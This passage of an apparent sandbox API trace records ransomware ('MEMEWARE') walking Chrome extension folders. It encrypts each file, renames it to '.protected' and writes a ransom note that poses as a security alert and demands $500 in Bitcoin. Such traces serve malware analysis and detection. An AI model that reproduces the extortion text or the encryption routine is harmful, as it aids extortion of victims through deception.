(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.804] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.804] CloseHandle (hObject=0x164) returned 1 [0078.804] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.804] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0078.805] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 141 [0078.805] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0078.805] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0078.805] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*") returned 143 [0078.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.805] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\.") returned 143 [0078.806] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.806] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\..") returned 144 [0078.806] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.806] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.806] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.806] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.806] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.806] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.806] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.806] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.807] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.807] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.807] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.807] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.808] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.808] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.808] CloseHandle (hObject=0x168) returned 1 [0078.808] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected") returned 165 [0078.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected")) returned 1 [0078.808] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.808] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.808] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0078.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.809] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.809] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.810] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.810] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.810] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.810] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.810] CloseHandle (hObject=0x164) returned 1 [0078.810] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0078.810] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 141 [0078.810] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0078.810] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0078.810] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*") returned 143 [0078.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.810] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\.") returned 143 [0078.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.811] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\..") returned 144 [0078.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.811] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.811] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.811] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.811] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.812] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.812] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.812] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.812] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.812] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.813] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.813] CloseHandle (hObject=0x168) returned 1 [0078.813] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected") returned 165 [0078.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected")) returned 1 [0078.813] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.813] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.813] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0078.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.814] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.814] lstrlenA 